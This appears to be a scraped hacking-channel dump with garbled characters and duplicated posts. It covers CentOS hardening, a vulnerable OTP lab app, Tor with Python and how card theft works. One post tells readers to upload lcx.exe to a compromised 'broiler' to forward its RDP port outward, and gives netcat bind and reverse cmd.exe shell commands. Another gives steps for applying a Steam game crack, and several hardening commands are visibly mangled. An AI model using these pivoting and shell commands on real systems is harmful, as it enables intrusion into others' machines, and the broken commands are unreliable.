InfoZip UnZip 6.00 and 6.1c22 Buffer Overflow .pdf
1.6 MB
Real Methode :
InfoZip UnZip 6.00 / 6.1c22 Buer Overow
InfoZip UnZip 6.00 / 6.1c22 Buer Overow
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ CentOS Server Security Tips :
A) Disable unnecessary commands SUID and SGID
If the setuid and setgid bits are set in binaries, these commands can run tasks with other user or group privileges, such as root privilege, which can lead to serious security problems.
B) Often, buffer overflow attacks can exploit these executables to run unauthorized code as root.
# find / -path / proc -prune -o -type f \ (-perm -4000 -o -perm -2000 \) -exec ls -l {} \;
To clear the setuid bit, run the following command:
# chmod us / path / to / binary_file
To clear the setgid bit, run the following command:
# chmod gs / path / to / binary_file
22. Check for unknown files and directories
Files or directories not owned by an existing account must be removed or user and group rights assigned.
C) Run the below find command to list files or directories without users and groups.
# find / -nouser -o -nogroup -exec ls -l {} \;
D) List of files available for recording
Keeping a writable file on the system can be dangerous because anyone can change it.
Run the command below to display writable files other than symbolic links, which are always writable to everyone.
# find / -path / proc -prune -o -perm -2! -type l βls
Create strong passwords
Create a password that is at least eight characters long.
Password must contain numbers, special characters and capital letters.
Use pwmake to generate a 128-bit password from / dev / urandom.
# pwmake 128
E) Implement a strong password policy
Force the system to use strong passwords by adding the following line to the /etc/pam.d/passwd file:
password required pam_pwquality.so retry = 3
By adding this line, you are entering a policy where the entered password cannot contain more than 3 characters in a monotone sequence, for example abcd, and more than 3 identical consecutive characters, for example 1111.
To force users to use a password of at least 8 characters, including all character classes, sequential character checking, add the following lines to /etc/security/pwquality.conf:
minlen = 8
minclass = 4
maxsequence = 3
maxrepeat = 3
How to Apply Strong User Password Policy in Ubuntu / Debian
F) Use password aging
The chage command can be used to control the age of a user's password.
To set the age of a user's password to 45 days, use the following command:
# chage -M 45 username
To disable password expiration use the command:
# chage -M -1 username
Force password expiration (user must change password at next login):
# chage -d 0 username
G) Blocking accounts
User accounts can be locked out by running passwd or usermod command:
# passwd -l username
# usermod -L username
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ CentOS Server Security Tips :
A) Disable unnecessary commands SUID and SGID
If the setuid and setgid bits are set in binaries, these commands can run tasks with other user or group privileges, such as root privilege, which can lead to serious security problems.
B) Often, buffer overflow attacks can exploit these executables to run unauthorized code as root.
# find / -path / proc -prune -o -type f \ (-perm -4000 -o -perm -2000 \) -exec ls -l {} \;
To clear the setuid bit, run the following command:
# chmod us / path / to / binary_file
To clear the setgid bit, run the following command:
# chmod gs / path / to / binary_file
22. Check for unknown files and directories
Files or directories not owned by an existing account must be removed or user and group rights assigned.
C) Run the below find command to list files or directories without users and groups.
# find / -nouser -o -nogroup -exec ls -l {} \;
D) List of files available for recording
Keeping a writable file on the system can be dangerous because anyone can change it.
Run the command below to display writable files other than symbolic links, which are always writable to everyone.
# find / -path / proc -prune -o -perm -2! -type l βls
Create strong passwords
Create a password that is at least eight characters long.
Password must contain numbers, special characters and capital letters.
Use pwmake to generate a 128-bit password from / dev / urandom.
# pwmake 128
E) Implement a strong password policy
Force the system to use strong passwords by adding the following line to the /etc/pam.d/passwd file:
password required pam_pwquality.so retry = 3
By adding this line, you are entering a policy where the entered password cannot contain more than 3 characters in a monotone sequence, for example abcd, and more than 3 identical consecutive characters, for example 1111.
To force users to use a password of at least 8 characters, including all character classes, sequential character checking, add the following lines to /etc/security/pwquality.conf:
minlen = 8
minclass = 4
maxsequence = 3
maxrepeat = 3
How to Apply Strong User Password Policy in Ubuntu / Debian
F) Use password aging
The chage command can be used to control the age of a user's password.
To set the age of a user's password to 45 days, use the following command:
# chage -M 45 username
To disable password expiration use the command:
# chage -M -1 username
Force password expiration (user must change password at next login):
# chage -d 0 username
G) Blocking accounts
User accounts can be locked out by running passwd or usermod command:
# passwd -l username
# usermod -L username
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦OTP BYPASS :
Vulnerable OTP Application created using PHP & Google OTP/Updated!
You will need
1. Web Server (Apache recommended)
2. PHP 7 and above
3. Mysql or MariaDB
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) get https://github.com/mddanish/Vulnerable-OTP-Application
2) A step by step series of examples that tell you have to get the application running
After installing Apache, PHP 7 and MariaDB, which I think that you know how to install, or else google about it.
3) Setting up Application database.
Run SQL File vuln_otp.sql against MariaDB to create necessary Database, Table and Columns
4) Adding Database details to application
Edit config > db_connection.php and details of Database connections details (Hostname, Username, Password, Database Name)
5) Open the Application in browser and have fun.
Running the tests
You can use Burp suite or Browser web developer mode to bypass OTP login. Remember to Register a test user before Bypassing it, and use Google Authenticator for OTP
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦OTP BYPASS :
Vulnerable OTP Application created using PHP & Google OTP/Updated!
You will need
1. Web Server (Apache recommended)
2. PHP 7 and above
3. Mysql or MariaDB
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) get https://github.com/mddanish/Vulnerable-OTP-Application
2) A step by step series of examples that tell you have to get the application running
After installing Apache, PHP 7 and MariaDB, which I think that you know how to install, or else google about it.
3) Setting up Application database.
Run SQL File vuln_otp.sql against MariaDB to create necessary Database, Table and Columns
4) Adding Database details to application
Edit config > db_connection.php and details of Database connections details (Hostname, Username, Password, Database Name)
5) Open the Application in browser and have fun.
Running the tests
You can use Burp suite or Browser web developer mode to bypass OTP login. Remember to Register a test user before Bypassing it, and use Google Authenticator for OTP
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - mddanish/Vulnerable-OTP-Application: Vulnerable OTP/2FA Application written in PHP using Google Authenticator
Vulnerable OTP/2FA Application written in PHP using Google Authenticator - mddanish/Vulnerable-OTP-Application
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Undetected...How to transfer data in HTTP header ?
The HTTP headers can be manipulated with the cURL program , which has the -H 'HEADER: VALUE' option .
A) For example, if we want to pass to the localhost / headers.php page a header named β undercode β with the value β Hello! How are you? ", Then just run the following command:
curl -H 'undercode: Hello! How are you?' localhost/headers.php
I'll show an example of exchanging data with a local web server.
B) If you have Kali Linux (and any Debian derivatives in general), then to start the web server run:
sudo systemctl start apache2.service
C) If you have Arch Linux / BlackArch, then to start the web server run:
sudo systemctl start httpd.service
Now create a headers.php file . To do this in Kali Linux:
sudo gedit /var/www/html/headers.php
D) On Arch Linux / BlackArch:
sudo gedit /srv/http/headers.php
And copy the following into it:
<?php
$headers = apache_request_headers();
if (isset($headers["undercode"])) {
echo $headers["undercode"];
}
E) That is, the script simply outputs the value of the Hackware header (if received).
If you open http: //localhost/headers.php in a web browser , a blank page will be displayed - nothing was received, and therefore nothing was displayed.
F) Let's run the command already discussed above, in which we pass the undercode header:
curl -H 'undercode: Hello! How are you?' localhost/headers.php
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Undetected...How to transfer data in HTTP header ?
The HTTP headers can be manipulated with the cURL program , which has the -H 'HEADER: VALUE' option .
A) For example, if we want to pass to the localhost / headers.php page a header named β undercode β with the value β Hello! How are you? ", Then just run the following command:
curl -H 'undercode: Hello! How are you?' localhost/headers.php
I'll show an example of exchanging data with a local web server.
B) If you have Kali Linux (and any Debian derivatives in general), then to start the web server run:
sudo systemctl start apache2.service
C) If you have Arch Linux / BlackArch, then to start the web server run:
sudo systemctl start httpd.service
Now create a headers.php file . To do this in Kali Linux:
sudo gedit /var/www/html/headers.php
D) On Arch Linux / BlackArch:
sudo gedit /srv/http/headers.php
And copy the following into it:
<?php
$headers = apache_request_headers();
if (isset($headers["undercode"])) {
echo $headers["undercode"];
}
E) That is, the script simply outputs the value of the Hackware header (if received).
If you open http: //localhost/headers.php in a web browser , a blank page will be displayed - nothing was received, and therefore nothing was displayed.
F) Let's run the command already discussed above, in which we pass the undercode header:
curl -H 'undercode: Hello! How are you?' localhost/headers.php
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Detailed introduction and usage of lcx port forwarding (lcx intranet forwarding posture):
A) Let's first explain in detail the LXC forwarding tools and usage methods:
lcx.exe is a port forwarding tool, which is equivalent to forwarding port 3389 on broiler A to machine B.
Of course, machine B must have an external network IP. In this way, the 3389 degree port of link B is equivalent to the 3389 of link A.
usage:
For example, monitor -listen 51 3389 on local machine B, and run -slave
local ip 51 broiler ip 3389 on broiler A, then you can connect the broiler's 3389 locally by connecting 127.0.0.1. The second is the local steering.
Example: Now there is a websehll with an IP of 222.221.221.22. Port 3389 is opened by port scanning,
but we can't connect normally when we enter the Internet IP. Then it is very likely to be the intranet server. We can see that we dos execute ipconfig.
B) Upload lcx.exe to broiler and then cx.exe -listen 51 3389 means to monitor port 51 and forward to port 3389.
The display is as follows [+] Listening port 51 β¦β¦
[+] Listen OK!
[+] Listening port 3389 β¦β¦
[+] Listen OK!
[+] Waiting for Client on port: 51 β¦β¦
Then run lcx.exe on the broiler -slave Your IP 51 222.221.221.22 3389
222.221.221.22 is the broiler IP I used for example. Replace it with yours.. After running, this machine monitors the port.
The following information is displayed
[+] Listening port 51 β¦β¦
[+] Listen OK!
[+] Listening port 3389 β¦β¦
[+] Listen OK!
[+] Waiting for Client on port: 51 β¦β¦
[+] Accept a Client on port 55 from 222.221.221.22 β¦β¦
[+] Waiting another Client on port:3389β¦.
Ok. Now link to 127.0.0.1 on your own machine or enter your own IP. It is
found that it is not your own machine, (or your own machine at all Can't connect), but broiler A! Advantages, get the intranet broiler.
Disadvantages, a little troublesome, and every time you have to port forward through sqltools. Of course, you can also use rebound Trojans to control broilers
C) The following is a supplement from other netizens:
Native: lcx -listen 2222 3333
2222 is the forwarding port, and 3333 is any unoccupied port of the machine
Broiler: lcx -slave 119.75.217.56 2222 127.0.0.1 3389
119.75.217.56 is the local IP, 2222 is the forwarding port, 127.0.0.1 is the broiler intranet IP, and 3389 is the remote terminal port
3389 format when connected 127.0.0.1:3333
D) Intranet forwarding gesture
1. Use of lcx
1. Execute on broiler: lcx.exe βslave public network ip + port broiler ip + port
For example: lcx.exe -slave xxx.xxx.xxx.xxx 10000 127.0.0.1 3389
It means to forward the 3389 port of the broiler to the 10000 port of the xxx.xxx.xxx.xxx public network
2. Execute Lcx.exe βlisten 10000 10001 on the public IP machine
For example: Lcx.exe βlisten 10001 10000
It means to listen to the 10001 port request on the public network ip machine and transmit the 10001 request to the 10000 port.
At this time, for RDP connection, you only need to enter 127.0.0.1:10000 to connect to the broiler remotely.
E) Two, nc rebound cmdshell
1. Open the broiler agent to execute cmdshell
Execute nc -l -p 2333 -t -e cmd.exe on the broiler
This means that the broiler monitors the local port 2333, and the response executes the cmd.exe program through telnet (-t) mode
Execute nc -nvv broiler ip 2333 on your own public network server
2. Reverse proxy execute cmdshell
Run nc -l -p 2333 on the public network server
It means to monitor the local port 2333 and log in to other computers on the stage
Execute nc -t -e cmd.exe on the broiler, public network server ip 2333
It means that the broiler can execute the cmd.exe program in telnet mode, and can give the execution right to the public network server through port 2333
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Detailed introduction and usage of lcx port forwarding (lcx intranet forwarding posture):
A) Let's first explain in detail the LXC forwarding tools and usage methods:
lcx.exe is a port forwarding tool, which is equivalent to forwarding port 3389 on broiler A to machine B.
Of course, machine B must have an external network IP. In this way, the 3389 degree port of link B is equivalent to the 3389 of link A.
usage:
For example, monitor -listen 51 3389 on local machine B, and run -slave
local ip 51 broiler ip 3389 on broiler A, then you can connect the broiler's 3389 locally by connecting 127.0.0.1. The second is the local steering.
Example: Now there is a websehll with an IP of 222.221.221.22. Port 3389 is opened by port scanning,
but we can't connect normally when we enter the Internet IP. Then it is very likely to be the intranet server. We can see that we dos execute ipconfig.
B) Upload lcx.exe to broiler and then cx.exe -listen 51 3389 means to monitor port 51 and forward to port 3389.
The display is as follows [+] Listening port 51 β¦β¦
[+] Listen OK!
[+] Listening port 3389 β¦β¦
[+] Listen OK!
[+] Waiting for Client on port: 51 β¦β¦
Then run lcx.exe on the broiler -slave Your IP 51 222.221.221.22 3389
222.221.221.22 is the broiler IP I used for example. Replace it with yours.. After running, this machine monitors the port.
The following information is displayed
[+] Listening port 51 β¦β¦
[+] Listen OK!
[+] Listening port 3389 β¦β¦
[+] Listen OK!
[+] Waiting for Client on port: 51 β¦β¦
[+] Accept a Client on port 55 from 222.221.221.22 β¦β¦
[+] Waiting another Client on port:3389β¦.
Ok. Now link to 127.0.0.1 on your own machine or enter your own IP. It is
found that it is not your own machine, (or your own machine at all Can't connect), but broiler A! Advantages, get the intranet broiler.
Disadvantages, a little troublesome, and every time you have to port forward through sqltools. Of course, you can also use rebound Trojans to control broilers
C) The following is a supplement from other netizens:
Native: lcx -listen 2222 3333
2222 is the forwarding port, and 3333 is any unoccupied port of the machine
Broiler: lcx -slave 119.75.217.56 2222 127.0.0.1 3389
119.75.217.56 is the local IP, 2222 is the forwarding port, 127.0.0.1 is the broiler intranet IP, and 3389 is the remote terminal port
3389 format when connected 127.0.0.1:3333
D) Intranet forwarding gesture
1. Use of lcx
1. Execute on broiler: lcx.exe βslave public network ip + port broiler ip + port
For example: lcx.exe -slave xxx.xxx.xxx.xxx 10000 127.0.0.1 3389
It means to forward the 3389 port of the broiler to the 10000 port of the xxx.xxx.xxx.xxx public network
2. Execute Lcx.exe βlisten 10000 10001 on the public IP machine
For example: Lcx.exe βlisten 10001 10000
It means to listen to the 10001 port request on the public network ip machine and transmit the 10001 request to the 10000 port.
At this time, for RDP connection, you only need to enter 127.0.0.1:10000 to connect to the broiler remotely.
E) Two, nc rebound cmdshell
1. Open the broiler agent to execute cmdshell
Execute nc -l -p 2333 -t -e cmd.exe on the broiler
This means that the broiler monitors the local port 2333, and the response executes the cmd.exe program through telnet (-t) mode
Execute nc -nvv broiler ip 2333 on your own public network server
2. Reverse proxy execute cmdshell
Run nc -l -p 2333 on the public network server
It means to monitor the local port 2333 and log in to other computers on the stage
Execute nc -t -e cmd.exe on the broiler, public network server ip 2333
It means that the broiler can execute the cmd.exe program in telnet mode, and can give the execution right to the public network server through port 2333
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
This script should be used only for fair purposes like making your own backup copies of games you own on your account.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) clone https://github.com/ZeDoCaixao/activate
2) Copy latest ACTiVATED crack .so-files to $HOME/.local/share/activate/x86/libsteam_api.so and $HOME/.local/share/activate/x86_64/libsteam_api.so. Copy script file (activate) anywhere in your $PATH, e.g. /usr/local/bin.
3) Go to game directory and enter activate. The script may ask for AppID if it can't find it. That's it.
cd ~/Games/SuperSteamGame
activate
4) It will replace libsteam_api.so files with ACTiVATED crack (of right architecture), detect a version of Steam interfaces and fill activated.ini files with right interfaces section.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
This script should be used only for fair purposes like making your own backup copies of games you own on your account.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) clone https://github.com/ZeDoCaixao/activate
2) Copy latest ACTiVATED crack .so-files to $HOME/.local/share/activate/x86/libsteam_api.so and $HOME/.local/share/activate/x86_64/libsteam_api.so. Copy script file (activate) anywhere in your $PATH, e.g. /usr/local/bin.
3) Go to game directory and enter activate. The script may ask for AppID if it can't find it. That's it.
cd ~/Games/SuperSteamGame
activate
4) It will replace libsteam_api.so files with ACTiVATED crack (of right architecture), detect a version of Steam interfaces and fill activated.ini files with right interfaces section.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - ZeDoCaixao/activate: Use ACTiVATED crack on Steam game
Use ACTiVATED crack on Steam game. Contribute to ZeDoCaixao/activate development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦β¬οΈ GoScan: interactive network scanner:
GoScan: an interactive network scanner client
GoScan Network Scanner is especially suitable for unstable environments such as: unstable and unreliable network connection, no available connections, etc.).
It uses a SQLite database to run scans, monitor and maintain health.
In addition, the scan runs in the background (disconnected from the main thread), so even if the connection to the machine running GoScan is lost, the results can be downloaded asynchronously.
Features:
Interactive network scanner with autocomplete,
Suitable for everyday and professional tasks,
Capable of host detection, port scans and service enumeration (integrates many tools such as: EyeWitness, Hydra, nikto, etc.)
Scanning is performed in the background, in case of connection loss, you can download the results asynchronously (there is no need to restart the process, data can be imported at different stages),
Supports all major stages of network enumeration,
and much more.
External Integrations [Service Support]
ARP: nmap
DNS: nmap, dnsrecon, dnsenum, host
FINGER: nmap, finger-user-enum
FTP: nmap, ftp-user-enum, hydra [AGGRESIVE]
HTTP: nmap, nikto, dirb, EyeWitness, SQLmap, fimap
RDP: nmap, EyeWitness
SMB: nmap, enum4linux, nbtscan, samrdump
SMTP: nmap, smtp-user-enum
SNMP: nmap, snmpcheck, onesixtyone, snmpwalk
SSH: hydra [AGGRESIVE]
SQL: nmap
VNC: EyeWitnes
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Building from source
Clone the repo: If you want to create a multiplatform binary, run:
$ git clone https://github.com/marco-lancini/goscan.git
2) Change to the GoScan directory and build it:
$ cd goscan / goscan /
$ make setup
$ make build
3) If you want to create a multi-platform binary, run:
$ make cross
π¦Installing the binary
This is the recommended installation method.
1) $ wget https://github.com/marcolancini/goscan/releases/download/v2.3/goscan_2.3_linux_amd64.zip $ unzip goscan_2.3_linux_amd64.zip
Then put the executable in PATH:
2) $ chmod + x goscan
3) $ sudo mv ./goscan / usr / local / bin / goscan
4) choose option via numbers
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦β¬οΈ GoScan: interactive network scanner:
GoScan: an interactive network scanner client
GoScan Network Scanner is especially suitable for unstable environments such as: unstable and unreliable network connection, no available connections, etc.).
It uses a SQLite database to run scans, monitor and maintain health.
In addition, the scan runs in the background (disconnected from the main thread), so even if the connection to the machine running GoScan is lost, the results can be downloaded asynchronously.
Features:
Interactive network scanner with autocomplete,
Suitable for everyday and professional tasks,
Capable of host detection, port scans and service enumeration (integrates many tools such as: EyeWitness, Hydra, nikto, etc.)
Scanning is performed in the background, in case of connection loss, you can download the results asynchronously (there is no need to restart the process, data can be imported at different stages),
Supports all major stages of network enumeration,
and much more.
External Integrations [Service Support]
ARP: nmap
DNS: nmap, dnsrecon, dnsenum, host
FINGER: nmap, finger-user-enum
FTP: nmap, ftp-user-enum, hydra [AGGRESIVE]
HTTP: nmap, nikto, dirb, EyeWitness, SQLmap, fimap
RDP: nmap, EyeWitness
SMB: nmap, enum4linux, nbtscan, samrdump
SMTP: nmap, smtp-user-enum
SNMP: nmap, snmpcheck, onesixtyone, snmpwalk
SSH: hydra [AGGRESIVE]
SQL: nmap
VNC: EyeWitnes
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Building from source
Clone the repo: If you want to create a multiplatform binary, run:
$ git clone https://github.com/marco-lancini/goscan.git
2) Change to the GoScan directory and build it:
$ cd goscan / goscan /
$ make setup
$ make build
3) If you want to create a multi-platform binary, run:
$ make cross
π¦Installing the binary
This is the recommended installation method.
1) $ wget https://github.com/marcolancini/goscan/releases/download/v2.3/goscan_2.3_linux_amd64.zip $ unzip goscan_2.3_linux_amd64.zip
Then put the executable in PATH:
2) $ chmod + x goscan
3) $ sudo mv ./goscan / usr / local / bin / goscan
4) choose option via numbers
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - marco-lancini/goscan: Interactive Network Scanner
Interactive Network Scanner. Contribute to marco-lancini/goscan development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π Using Tor with Python :
1) download https://www.torproject.org/download/tor/
2) Install Python requests
We need Python requests
You can install it using the following commands:
pip install requests
pip install requests [socks]
pip install requests [security]
Python code working with TOR
The following Python code allows you to run TOR and Python together.
We will use the requests library to execute requests.
3) Make sure you have TOR running before running the code.
import requests
domain = "https://itsecforu.ru"
#define your proxies
#the socks5h method allows the socks server to translate the #hostname. So make sure that you add 'socks5h'.
proxies = {
'http': 'socks5h://127.0.0.1:9050',
'https': 'socks5h://127.0.0.1:9050'
}
a = requests.get(domain.strip(), proxies=proxies).text
print(a)
When can you use this
There can be various reasons why you might want to use TOR and Python together.
4) Python itself is just a programming language, and if it works in Python, then most likely the same approach will work in other programming languages ββas well.
use case 1: crawler
You can use this code to create your own Python crawler via TOR.
Just create a list or dictionary of URLs you want to visit and instruct the tool to use your list.
myurls = ['url1','url2','url3','url4']
for url in myurls:
#dosomething
use case 2: Forensics
In some cases, you may only be interested in the text.
5) The code allows you to load entire pages without viewing visual content.
This can be a big advantage in some use cases.
my_interest = ['keyword1','keyword2','keyword3','keyword4']
for keyword in my_interest:
if keyword in a:
#dosomething
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π Using Tor with Python :
1) download https://www.torproject.org/download/tor/
2) Install Python requests
We need Python requests
You can install it using the following commands:
pip install requests
pip install requests [socks]
pip install requests [security]
Python code working with TOR
The following Python code allows you to run TOR and Python together.
We will use the requests library to execute requests.
3) Make sure you have TOR running before running the code.
import requests
domain = "https://itsecforu.ru"
#define your proxies
#the socks5h method allows the socks server to translate the #hostname. So make sure that you add 'socks5h'.
proxies = {
'http': 'socks5h://127.0.0.1:9050',
'https': 'socks5h://127.0.0.1:9050'
}
a = requests.get(domain.strip(), proxies=proxies).text
print(a)
When can you use this
There can be various reasons why you might want to use TOR and Python together.
4) Python itself is just a programming language, and if it works in Python, then most likely the same approach will work in other programming languages ββas well.
use case 1: crawler
You can use this code to create your own Python crawler via TOR.
Just create a list or dictionary of URLs you want to visit and instruct the tool to use your list.
myurls = ['url1','url2','url3','url4']
for url in myurls:
#dosomething
use case 2: Forensics
In some cases, you may only be interested in the text.
5) The code allows you to load entire pages without viewing visual content.
This can be a big advantage in some use cases.
my_interest = ['keyword1','keyword2','keyword3','keyword4']
for keyword in my_interest:
if keyword in a:
#dosomething
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
www.torproject.org
The Tor Project | Privacy & Freedom Online
Defend yourself against tracking and surveillance. Circumvent censorship.
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π« A look at how credit card information can be stolen and how to keep you safe :
1) Cloning maps
Making a cloned credit card is the easiest way for a thief to spend someone else's money.
All they have to do is temporarily access your credit card (often in fractions of a minute) and program it onto another prepaid card.
The cloned cards can then be sold on the darknet, usually through cryptocurrency.
Many of these stolen cards resemble real cards, and the attention to detail is mind-boggling.
2) How can this be prevented?
To prevent credit card cloning, try not to transfer your credit card to another person unless it is an emergency.
Many restaurants, clubs and bars now have desktop payment terminals.
Change your PIN regularly and keep track of small unaccounted charges on your credit card with SMS alerts or alerts from the bank app on your phone.
Many thieves made small spending on a cloned credit card at first in order to make a big purchase later.
This gives you at least a lower risk for this problem.
3) Skimming cards
Breathing in the neck of credit card cloning, ATM skimming is one of the most common ways to get credit and debit card data.
It typically uses magnetic stripe cards rather than chip and pin code cards, but as the story suggests, thieves can also install a mini camera on the skimmer to capture the pin number.
Skimmers can also be placed in the shadow terminal of the point of sale and are not detectable with the naked eye.
Law enforcement usually monitors thieves using this method, but skimming remains a fairly popular way of collecting data from someone's credit card.
You are more vulnerable if you are traveling to a country where the police turn a blind eye to such crimes.
4) Formjacking
The digital equivalent of ATM skimming, "formjacking" is a term Symantec uses to refer to hackers who steal credit card information from checkout pages on websites.
They usually install malicious software, usually JavaScript code, to remove credit card numbers.
Cryptojacking is another similar term that refers to the withdrawal of cryptocurrency details.
Formjacking became a threat in 2019-2020 as leading websites such as British Airways, Ticketmaster, Home Depot, Target, and Feedify reported hacking incidents.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π« A look at how credit card information can be stolen and how to keep you safe :
1) Cloning maps
Making a cloned credit card is the easiest way for a thief to spend someone else's money.
All they have to do is temporarily access your credit card (often in fractions of a minute) and program it onto another prepaid card.
The cloned cards can then be sold on the darknet, usually through cryptocurrency.
Many of these stolen cards resemble real cards, and the attention to detail is mind-boggling.
2) How can this be prevented?
To prevent credit card cloning, try not to transfer your credit card to another person unless it is an emergency.
Many restaurants, clubs and bars now have desktop payment terminals.
Change your PIN regularly and keep track of small unaccounted charges on your credit card with SMS alerts or alerts from the bank app on your phone.
Many thieves made small spending on a cloned credit card at first in order to make a big purchase later.
This gives you at least a lower risk for this problem.
3) Skimming cards
Breathing in the neck of credit card cloning, ATM skimming is one of the most common ways to get credit and debit card data.
It typically uses magnetic stripe cards rather than chip and pin code cards, but as the story suggests, thieves can also install a mini camera on the skimmer to capture the pin number.
Skimmers can also be placed in the shadow terminal of the point of sale and are not detectable with the naked eye.
Law enforcement usually monitors thieves using this method, but skimming remains a fairly popular way of collecting data from someone's credit card.
You are more vulnerable if you are traveling to a country where the police turn a blind eye to such crimes.
4) Formjacking
The digital equivalent of ATM skimming, "formjacking" is a term Symantec uses to refer to hackers who steal credit card information from checkout pages on websites.
They usually install malicious software, usually JavaScript code, to remove credit card numbers.
Cryptojacking is another similar term that refers to the withdrawal of cryptocurrency details.
Formjacking became a threat in 2019-2020 as leading websites such as British Airways, Ticketmaster, Home Depot, Target, and Feedify reported hacking incidents.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
KISA holds a seminar to strengthen information protection capabilities in the Arab region.
#international
#international
Forwarded from UNDERCODE NEWS